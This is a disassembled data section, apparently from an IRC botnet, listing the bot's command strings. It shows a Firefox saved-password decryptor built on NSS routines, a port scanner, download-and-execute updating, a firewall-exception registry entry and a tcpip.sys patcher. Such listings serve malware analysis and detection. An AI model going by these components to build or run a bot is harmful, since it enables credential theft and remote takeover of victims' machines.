aTooManySpecifi db 'Too many specified.',0 ; DATA XREF: sub_40198E+197C�o
; .text:off_41E0BC�o
aFound db 'Found',0 ; DATA XREF: .text:0041E0B8�o
; .text:0041E0C0�o ...
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found string "%s" in "%s" ',0Ah ; DATA XREF: sub_4013E5+CD�o
db 0Ah,0
align 4
dword_419388 dd 0 ; DATA XREF: sub_40198E+70B�o
; sub_408EF0+27�o ...
a@r00t db '*@r00t',0 ; DATA XREF: .text:off_41E300�o
align 4
aS_4: ; DATA XREF: sub_40198E+6D3�o
unicode 0, <>,0
aAu db 'au',0 ; DATA XREF: sub_40198E+22CC�o
align 4
aDu db 'du',0 ; DATA XREF: sub_40198E+2505�o
align 10h
aLogout db 'logout',0 ; DATA XREF: sub_40198E+E1F�o
align 4
aFind_0 db 'find',0 ; DATA XREF: sub_40198E+2774�o
align 10h
aFind db 'FIND',0 ; DATA XREF: sub_40198E+18E8�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40198E+1513�o
align 10h
aT: ; DATA XREF: sub_40198E+12A0�o
unicode 0, <t>,0
aProcs db 'procs',0 ; DATA XREF: sub_40198E+1553�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_40198E+1EA1�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_40198E+145F�o
align 4
aInfo db 'info',0 ; DATA XREF: sub_40198E+11FE�o
align 4
aDriver db 'driver',0 ; DATA XREF: sub_40198E+149D�o
align 4
asc_4193EC: ; DATA XREF: sub_40198E+14CD�o
unicode 0, <>,0
aDie db 'die',0 ; DATA XREF: sub_40198E+DED�o
aNick_0 db 'nick',0 ; DATA XREF: sub_40198E+1D44�o
align 4
aJ: ; DATA XREF: sub_40198E+1D6D�o
unicode 0, <j>,0
aP: ; DATA XREF: sub_40198E+1D8E�o
unicode 0, <p>,0
aR: ; DATA XREF: sub_40198E+1DA7�o
unicode 0, <r>,0
aHttp db 'http',0 ; DATA XREF: sub_40198E+FD7�o
align 10h
aRnick db 'rnick',0 ; DATA XREF: sub_40198E+C85�o
align 4
aHttpstop db 'httpstop',0 ; DATA XREF: sub_40198E+118F�o
align 4
aR_e_c_o_n_n_e_ db 'R.e.c.o.n.n.e.c.t',0 ; DATA XREF: sub_40198E+F28�o
align 4
aD_i_s_c_o_n_n_ db 'd.i.s.c.o.n.n.e.c.t',0 ; DATA XREF: sub_40198E+F51�o
aLeave db 'leave',0 ; DATA XREF: sub_40198E+F7B�o
align 4
aLog db 'log',0 ; DATA XREF: sub_40198E+1416�o
aKillth db 'killth',0 ; DATA XREF: sub_40198E+1DE3�o
align 10h
aDns db 'dns',0 ; DATA XREF: sub_40198E+1F01�o
aKillproc db 'killproc',0 ; DATA XREF: sub_40198E+1801�o
align 10h
aKillid db 'killid',0 ; DATA XREF: sub_40198E+1870�o
align 4
aMircmd db 'mIRCMD',0 ; DATA XREF: sub_40198E+1F8F�o
align 10h
aPm db 'pm',0 ; DATA XREF: sub_40198E+2026�o
align 4
aAct db 'act',0 ; DATA XREF: sub_40198E+2075�o
aCyc db 'cyc',0 ; DATA XREF: sub_40198E+20E4�o
aMode db 'mode',0 ; DATA XREF: sub_40198E+2152�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_40198E+218C�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_40198E+2227�o
align 4
aExe db 'exe',0 ; DATA XREF: sub_40198E+2451�o
aSn db 'sn',0 ; DATA XREF: sub_40198E+1698�o
align 4
aGftp db 'gftp',0 ; DATA XREF: sub_40198E+EAF�o
align 4
aSftp db 'sftp',0 ; DATA XREF: sub_40198E+2D7D�o
align 4
aWinkey db 'winkey',0 ; DATA XREF: sub_40198E+CDD�o
align 4
aFirefox db 'firefox',0 ; DATA XREF: sub_40198E+11C9�o
aPst db 'pst',0 ; DATA XREF: sub_40198E+13A4�o
aSkybye db 'skybye',0 ; DATA XREF: sub_40198E+2664�o
align 4
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0 ; DATA XREF: sub_401648+5E�o
align 10h
aS db '%s',0Dh,0Ah,0 ; DATA XREF: sub_4016B8+25�o
; sub_40B1D5+F0�o
align 4
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4017B6+3C�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4017B6+2A�o
; sub_40198E+617�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_4017B6+23�o
; sub_40198E+1E7�o ...
align 4
aSS db '%s%s',0 ; DATA XREF: sub_401822+110�o
; sub_404BAB+181�o ...
align 4
aSSS_0 db '%s%s%s',0 ; DATA XREF: sub_401822+F0�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+2DF3�o
align 4
aFailedErrorD_ db 'Failed, error: <%d>.',0 ; DATA XREF: sub_40198E+2D0D�o
align 4
aSScann3rOnSDDS db '%s Scann3r on %s:%d %d secs %d mins %d threads.',0
; DATA XREF: sub_40198E+2CB4�o
aNoIp_ db 'no IP.',0 ; DATA XREF: sub_40198E:loc_4043E5�o
align 4
aP0rtIsInvalid_ db 'p0rt is invalid.',0 ; DATA XREF: sub_40198E+28E9�o
align 4
aDTooManyShit_ db '%d Too Many Shit.',0 ; DATA XREF: sub_40198E+27FB�o
align 4
aFailedToStar_2 db 'Failed to start: <%d>.',0 ; DATA XREF: sub_40198E+273D�o
align 4
aStartingSSForS db 'Starting: (%s:%s) for %s seconds.',0 ; DATA XREF: sub_40198E+26E1�o
align 4
aFailedToStartT db 'Failed to start transfer, error: <%d>.',0 ; DATA XREF: sub_40198E+2622�o
align 10h
aGettingUrlSToS db 'Getting URL: %s to: %s.',0 ; DATA XREF: sub_40198E+25C3�o
aCouldnTExecute db 'couldn',27h,'t execute file.',0 ; DATA XREF: sub_40198E+24E3�o
align 10h
aShitMustBeDiff db 'SHit must be different than current running process.',0
; DATA XREF: sub_40198E:loc_403DCC�o
align 4
aFailedToStartD db 'Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_40198E+2416�o
align 4
aGettingUpdateF db 'Getting Update From: %s.',0 ; DATA XREF: sub_40198E+23B7�o
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40198E+2333�o
align 10h
aSSSS_0 db '%s %s %s :%s',0 ; DATA XREF: sub_40198E+21E5�o
; sub_40198E+2280�o
align 10h
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+217F�o
align 4
dword_4196EC dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40198E+20BE�o
dword_4196F8 dd 6D6D6F43h, 20646E61h, 746E6573h, 2Eh ; DATA XREF: sub_40198E:loc_403961�o
aClientNotOpen_ db 'Client not open.',0 ; DATA XREF: sub_40198E+1FCC�o
align 4
aCouldNotResolv db 'could not resolve host',0 ; DATA XREF: sub_40198E+1F84�o
align 4
aSS_1 db '%s -> %s',0 ; DATA XREF: sub_40198E+1F56�o
align 10h
aCouldnTOpenFil db 'couldn',27h,'t open file.',0 ; DATA XREF: sub_40198E+1EF9�o
aFileOpened_ db 'file opened.',0 ; DATA XREF: sub_40198E+1ED2�o
align 4
aOpen_0 db 'open',0 ; DATA XREF: sub_40198E+1EB6�o
; sub_4056A2+2E7�o
align 4
aFail3dToKiThre db 'Fail3d to ki|| thread: %s.',0 ; DATA XREF: sub_40198E:loc_4037E8�o
align 4
aKilledThreadS_ db 'Killed thread: %s.',0 ; DATA XREF: sub_40198E+1E53�o
align 4
aNoActiveThread db 'No active threads found.',0 ; DATA XREF: sub_40198E:loc_4037AA�o
align 4
aStoppedDThread db 'Stopped: %d thread(s).',0 ; DATA XREF: sub_40198E+1E12�o
align 10h
aAll db 'all',0 ; DATA XREF: sub_40198E+1DF8�o
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+1D9F�o
; sub_40198E+210F�o
align 10h
aP0rtInvalid_ db 'p0rt invalid.',0 ; DATA XREF: sub_40198E:loc_4036C5�o
align 10h
aCanNotStartSca db 'Can not start scanner',0 ; DATA XREF: sub_40198E+1CCE�o
align 4
aSScannerOnSDDe db '%s Scanner on %s:%d delay %d %d mins %d threads.',0
; DATA XREF: sub_40198E+1C76�o
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40198E+1C4B�o
; sub_40198E+2C89�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_40198E+1C44�o
; sub_40198E+2C82�o
align 10h
aS_0 db '%s',0 ; DATA XREF: sub_40198E+1B7C�o
; sub_40198E+29D3�o ...
align 8
dbl_419858 dq 2.56e2 ; DATA XREF: sub_40198E+1B54�r
; sub_40198E+2991�r ...
dbl_419860 dq 3.0517578125e-5 ; DATA XREF: sub_40198E+1B4E�r
; sub_40198E+298B�r ...
dword_419868 dd 252E6425h, 64252E64h, 64252Eh ; DATA XREF: sub_40198E+1B35�o
; sub_40198E+2961�o ...
aFailedToKiPr_0 db 'Failed to ki|| process ID: %s',0 ; DATA XREF: sub_40198E:loc_403231�o
align 4
aProcessKilledI db 'Process killed ID: %s',0 ; DATA XREF: sub_40198E+189C�o
align 4
aFailedToKiProc db 'Failed to ki|| process: %s',0 ; DATA XREF: sub_40198E:loc_4031C4�o
align 4
aProcessKilledS db 'Process killed: %s',0 ; DATA XREF: sub_40198E+182F�o
align 4
aNoShitThreadFo db 'No Shit thread found.',0 ; DATA XREF: sub_40198E:loc_403158�o
align 4
aCarnivoreStopp db 'Carnivore stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_40198E+17C3�o
align 10h
aOff db 'off',0 ; DATA XREF: sub_40198E+17A4�o
aFailedToStar_1 db 'Failed to start Shit thread, error: <%d>.',0
; DATA XREF: sub_40198E+177B�o
word_41994E dw 0 ; DATA XREF: sub_40198E+16FD�o
; sub_40198E+1C07�o ...
aOn db 'on',0 ; DATA XREF: sub_40198E+16AD�o
align 4
aFailedToStar_0 db 'Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_40198E+1658�o
align 4
aProccessList_ db 'Proccess list.',0 ; DATA XREF: sub_40198E+15F9�o
align 4
aFull db 'full',0 ; DATA XREF: sub_40198E+15D9�o
align 4
aAlreadyRunning db 'Already running.',0 ; DATA XREF: sub_40198E+157F�o
; sub_40198E+16CD�o
align 10h
aScanner db 'Scanner',0 ; DATA XREF: sub_40198E+1531�o
aScan db 'Scan',0 ; DATA XREF: sub_40198E+152C�o
align 10h
aGoinToHellD db 'Goin TO Hell :D',0 ; DATA XREF: sub_40198E+14E9�o
aFailedToStartL db 'Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_40198E+1379�o
align 4
aListThreads_ db 'List threads.',0 ; DATA XREF: sub_40198E+131A�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_40198E+12F4�o
dword_419A10 dd 42283403h, 4E495430h, 20294F46h, 76323103h, 69737265h
; DATA XREF: sub_40198E+1274�o
dd 33A6E6Fh, 78655320h, 69685379h, 31032074h, 3A646932h
dd 73252003h, 3103202Eh, 6C696632h, 6D616E65h, 20033A65h
dd 202E7325h, 73323103h, 74726174h, 6E207075h, 3A656D61h
dd 73252003h, 3103202Eh, 54505532h, 3A454D49h, 73252003h
dd 2Eh
dword_419A78 dd 626557h ; DATA XREF: sub_40198E+11AD�o
aServer db 'Server',0 ; DATA XREF: sub_40198E+11A8�o
align 4
aFailedToStartS db 'Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_40198E+1147�o
aServerListenin db 'Server listening on IP: http://%s:%d, Directory: %s\.',0
; DATA XREF: sub_40198E+10E8�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+FBC�o
align 4
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40198E+F96�o
align 4
aQuitLater_0 db 'QUIT :later',0 ; DATA XREF: sub_40198E+F61�o
aQuitReconnecti db 'QUIT :reconnecting',0 ; DATA XREF: sub_40198E+F38�o
align 4
aCftpServerSPor db 'CFTP server: %s, port: %d, user: %s, pass: %s, file: %s.',0
; DATA XREF: sub_40198E+EDE�o
align 10h
aUserSLoggedO_0 db 'user %s logged out.',0Dh,0Ah,0 ; DATA XREF: sub_40198E+E62�o
align 4
aCouldnTFindKey db 'Couldn',27h,'t find Key',0 ; DATA XREF: sub_40198E+DC1�o
align 4
aFindbot db 'findbot',0 ; DATA XREF: sub_40198E+D78�o
aKillbot db 'killbot',0 ; DATA XREF: sub_40198E+D40�o
aFoundKey_29s db 'Found Key: %.29s',0 ; DATA XREF: sub_40198E+D19�o
align 10h
a63 db '63',0 ; DATA XREF: sub_40198E+B78�o
align 4
asc_419BB4: ; DATA XREF: sub_40198E+B59�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40198E+B28�o
align 10h
aServer_0 db '$server',0 ; DATA XREF: sub_40198E+B1D�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40198E+B0C�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40198E+AF4�o
align 4
aUser db '$user',0 ; DATA XREF: sub_40198E+AE3�o
align 4
aMe db '$me',0 ; DATA XREF: sub_40198E+AD1�o
aD db '$%d',0 ; DATA XREF: sub_40198E+A6F�o
aD_0 db '$%d-',0 ; DATA XREF: sub_40198E+9D1�o
align 4
aUserSSLoggedIn db 'user %s(%s) logged in.',0 ; DATA XREF: sub_40198E+8F7�o
align 4
aOkYouReHere_ db 'Ok You',27h,'re Here.',0 ; DATA XREF: sub_40198E+8D7�o
dword_419C1C dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40198E+869�o
dd 0A0Dh
dword_419C34 dd 4E495001h, 47h ; DATA XREF: sub_40198E+835�o
dword_419C3C dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40198E+82A�o
dd 0D017325h, 0Ah
dword_419C58 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40198E+7FD�o
dword_419C64 dd 23h ; DATA XREF: sub_40198E+771�o
; sub_40BB40+1B�o
aFailedAuthSS_ db '*failed auth %s(%s).',0 ; DATA XREF: sub_40198E+73C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40198E+640�o
; sub_40198E+921�o ...
aJ0in3dChannelS db 'j0in3d channel %s.',0 ; DATA XREF: sub_40198E+5A2�o
align 4
a353 db '353',0 ; DATA XREF: sub_40198E+565�o
aQuit db 'QUIT',0 ; DATA XREF: sub_40198E+527�o
align 4
aPart db 'PART',0 ; DATA XREF: sub_40198E+516�o
; sub_40198E+5E8�o
align 4
aSS_0 db ':%s%s',0 ; DATA XREF: sub_40198E+4F2�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40198E+436�o
align 4
aNiceGameMrS db 'Nice Game Mr %s!',0 ; DATA XREF: sub_40198E+40C�o
align 10h
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+3AB�o
; sub_40198E+60C�o
aUserSLoggedOut db 'user %s logged out.',0 ; DATA XREF: sub_40198E+390�o
; sub_40198E+5CB�o
aKick db 'KICK',0 ; DATA XREF: sub_40198E+333�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+2EE�o
; sub_40198E+CC2�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40198E+2AD�o
a@: ; DATA XREF: sub_40198E+26A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40198E+25A�o
a005 db '005',0 ; DATA XREF: sub_40198E+245�o
a001 db '001',0 ; DATA XREF: sub_40198E+230�o
aPong db 'pong',0 ; DATA XREF: sub_40198E+203�o
align 4
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+1D4�o
; sub_40198E+3F2�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40198E+1AF�o
; sub_40198E+21A�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_40198E+19D�o
align 4
asc_419D48: ; DATA XREF: sub_40198E+18E�o
; sub_40198E+6F9�o
unicode 0, <!>,0
asc_419D4C: ; DATA XREF: sub_40198E+9D�o
; sub_40198E+C2D�o ...
unicode 0, < >,0
asc_419D50 db ' :',0 ; DATA XREF: sub_40198E+7B�o
; sub_40198E:loc_4022FE�o
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40479E+5E�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40479E+35�o
align 4
aTcpipPatcher db 'tcpip patcher!!',0 ; DATA XREF: sub_404901+1D1�o
aSDriversTcpip_ db '%s\drivers\tcpip.sys',0 ; DATA XREF: sub_404901+186�o
align 4
aConnectedToS_ db 'connected to %s.',0 ; DATA XREF: sub_404901+114�o
align 4
aShitStarted_ db 'Shit started.',0 ; DATA XREF: sub_404BAB+4C6�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_404BAB+44E�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aSEnabledS db '%s:*:Enabled:%s',0 ; DATA XREF: sub_404BAB+432�o
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_404BAB+344�o
align 4
aSDriversS db '%s\drivers\%s',0 ; DATA XREF: sub_404BAB+20E�o
align 4
aInsidetm db 'InsideTm',0 ; DATA XREF: sub_404BAB+122�o
align 4
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_404BAB+EC�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_404BAB+36�o
; sub_407D3E+8DE�o
align 10h
aBadUrlOrDnsErr db 'Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_4056A2+43E�o
align 4
aUpdateFailedEr db 'Update failed: Error executing file: %s.',0 ; DATA XREF: sub_4056A2+430�o
align 4
aDownloaded_1fk db 'Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_4056A2+387�o
aOpenedS_ db 'Opened: %s.',0 ; DATA XREF: sub_4056A2+309�o
aDownloaded_1fK db 'Downloaded %.1f KB to %s @ %.1f KB/sec.',0 ; DATA XREF: sub_4056A2+290�o
align 10h
dbl_419F50 dq 9.765625e-4 ; DATA XREF: sub_4056A2+25F�r
; sub_4056A2:loc_405921�r ...
dbl_419F58 dq 4.294967296e9 ; DATA XREF: sub_4056A2+257�r
; sub_4056A2+279�r ...
aFilesizeIsInco db 'Filesize is incorrect: (%d != %d).',0 ; DATA XREF: sub_4056A2+1CF�o
align 4
aUpdateSDkbTran db 'Update: %s (%dKB transferred).',0 ; DATA XREF: sub_4056A2:loc_40583F�o
align 4
aFileDownloadSD db 'File download: %s (%dKB transferred).',0 ; DATA XREF: sub_4056A2+196�o
align 4
aCouldnTOpenF_0 db 'Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_4056A2+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_405BB7:loc_405BFA�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_405BB7:loc_405BF4�o
aDisk db 'Disk',0 ; DATA XREF: sub_405BB7:loc_405BEE�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_405BB7:loc_405BE8�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_405BB7:loc_405BE2�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_405BB7:loc_405BDC�o
a?: ; DATA XREF: sub_405BB7+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_405C48:loc_405D20�o
; sub_405D63+24�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_405C48+6C�o
align 4
aSDriveSSDiskSL db '%s Drive (%s): %s Disk, %s Lib, %s .',0 ; DATA XREF: sub_405D63+7D�o
align 4
aSDriveSShit_ db '%s Drive (%s): shit.',0 ; DATA XREF: sub_405D63+47�o
align 4
aA db 'A:\',0 ; DATA XREF: sub_405E21:loc_405E55�o
aSoftwareClient db 'SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command'
; DATA XREF: sub_405E94+F�o
db 0
align 4
asc_41A0AC: ; DATA XREF: sub_40600B+3C�o
; sub_406231+142�o
unicode 0, </>,0
aR_0: ; DATA XREF: sub_4060C7+E�o
; sub_406231+B7�o
unicode 0, <r>,0
asc_41A0B4: ; DATA XREF: sub_406231+173�o
unicode 0, <=>,0
aPath db 'path=',0 ; DATA XREF: sub_406231:loc_406340�o
align 10h
aNameDefault db 'name=default',0 ; DATA XREF: sub_406231+F5�o
align 10h
aProfiles_ini db '\profiles.ini',0 ; DATA XREF: sub_406231+A6�o
align 10h
asc_41A0E0: ; DATA XREF: sub_406231+7E�o
; sub_40AB64+44�o
unicode 0, <\>,0
aApplicationDat db 'Application Data\Mozilla\Firefox',0 ; DATA XREF: sub_406231+25�o
align 4
aPl_base64decod db 'PL_Base64Decode',0 ; DATA XREF: sub_406425+166�o
aPk11_checkuser db 'PK11_CheckUserPassword',0 ; DATA XREF: sub_406425+11B�o
align 10h
aPk11sdr_decryp db 'PK11SDR_Decrypt',0 ; DATA XREF: sub_406425+109�o
aPk11_authentic db 'PK11_Authenticate',0 ; DATA XREF: sub_406425+F7�o
align 4
aPk11_freeslot db 'PK11_FreeSlot',0 ; DATA XREF: sub_406425+E5�o
align 4
aPk11_getintern db 'PK11_GetInternalKeySlot',0 ; DATA XREF: sub_406425+D3�o
aNss_shutdown db 'NSS_Shutdown',0 ; DATA XREF: sub_406425+C1�o
align 4
aNss_init db 'NSS_Init',0 ; DATA XREF: sub_406425+B4�o
align 4
aSoftokn3_dll db 'softokn3.dll',0 ; DATA XREF: sub_406425+58�o
align 4
aPlds4_dll db 'plds4.dll',0 ; DATA XREF: sub_406425+47�o
align 4
aNspr4_dll db 'nspr4.dll',0 ; DATA XREF: sub_406425+24�o
align 10h
aNss3_dll db 'nss3.dll',0 ; DATA XREF: sub_406425+1D�o
align 4
aPlc4_dll db 'plc4.dll',0 ; DATA XREF: sub_406425+18�o
align 4
asc_41A1D8: ; DATA XREF: sub_406676:loc_40671B�o
unicode 0, <~>,0
asc_41A1DC: ; DATA XREF: sub_406761+200�o
; .text:00409980�o ...
unicode 0, <:>,0
aS_5 db '%s ',0 ; DATA XREF: sub_406761+13C�o
a2d db '#2d',0 ; DATA XREF: sub_406761+E2�o
a2c db '#2c',0 ; DATA XREF: sub_406761+C1�o
aSignons2_txt db '/signons2.txt',0 ; DATA XREF: sub_406761+22�o
align 4
aSignons_txt db '/signons.txt',0 ; DATA XREF: sub_406761+F�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_406C59+64D�o
align 8
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_406C59+638�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
aPrivmsgSFoun_0 db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_406C59+61D�o
align 10h
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_406C59+58E�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_406C59+566�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_406C59:loc_40717C�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_406C59+51C�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_406C59+476�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_406C59+439�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_406C59+406�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_406C59:loc_407026�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_406C59+3C6�o
align 4
aSS_2 db '%s%s/',0 ; DATA XREF: sub_406C59+379�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_406C59+335�o
; sub_406C59+48B�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_406C59+308�o
align 4
aS_1 db '<%s>',0 ; DATA XREF: sub_406C59+2DE�o
; sub_406C59+418�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_406C59+2B4�o
aAm db 'AM',0 ; DATA XREF: sub_406C59+293�o
align 4
aPm_0 db 'PM',0 ; DATA XREF: sub_406C59+288�o
align 4
a_: ; DATA XREF: sub_406C59+24C�o
; sub_408D3F+33�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_406C59+231�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_406C59+1BF�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406C59:loc_406D9A�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_406C59+12A�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_406C59+F2�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_406C59+AC�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_406C59+6E�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406C59+45�o
asc_41A688: ; DATA XREF: sub_406C59+29�o
; sub_40752D+FA�o
dw 0Ah
unicode 0, <>,0
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4073C5+E3�o
db 'Server: myShit',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4073C5+C9�o
db 'Server: myShit',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_4073C5+93�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_4073C5+7A�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_4073C5:loc_40742C�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_4073C5+60�o
align 4
aFailedToStartW db 'Failed to start work3r thread, error: <%d>.',0
; DATA XREF: sub_40752D+27C�o
aWorkerThreadOf db 'Worker thread of s3rv3r thread: %d.',0 ; DATA XREF: sub_40752D+20A�o
asc_41A8F4: ; DATA XREF: sub_40752D+156�o
unicode 0, <*>,0
aS_6 db '\%s',0 ; DATA XREF: sub_40752D+2F�o
aErrorShitFaile db 'Error: shit failed, returned: <%d>.',0 ; DATA XREF: sub_4077DC+3E1�o
asc_41A920 db 0Dh,0Ah,0 ; DATA XREF: sub_4077DC+2BE�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_4077DC+258�o
align 4
byte_41A92C db 42h ; DATA XREF: sub_407C63+9C�r
